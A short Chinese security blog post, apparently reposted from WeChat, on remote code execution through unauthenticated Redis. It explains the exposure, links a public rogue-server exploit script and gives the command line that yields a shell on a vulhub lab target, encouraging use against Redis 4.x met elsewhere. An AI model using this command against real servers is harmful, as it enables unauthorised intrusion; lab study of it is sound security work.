01
—
Redis-RCE
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导致用户未授权访问,可能导致,SSH远程登录,写入webshell,交互式shell,反弹shell等操作
影响版本:Redis 2.x,3.x,4.x,5.x
小编这里找到一个改进过后的RCE脚本:
https:
//github.com/Testzero-wz/Awsome-Redis-Rogue-Server
靶机(vulhub)启动redis后,直接上命令
python3
redis_rogue_server
.py
-rhost
192
.168
.x
.x
-lhost
192
.168
.x
.x
-v
输入
i
,获取
shell
挺好使的脚本,下回遇到redis 4.x的版本,直接打。
原文始发于微信公众号(道玄网安驿站):Redis未授权访问利用RCE脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论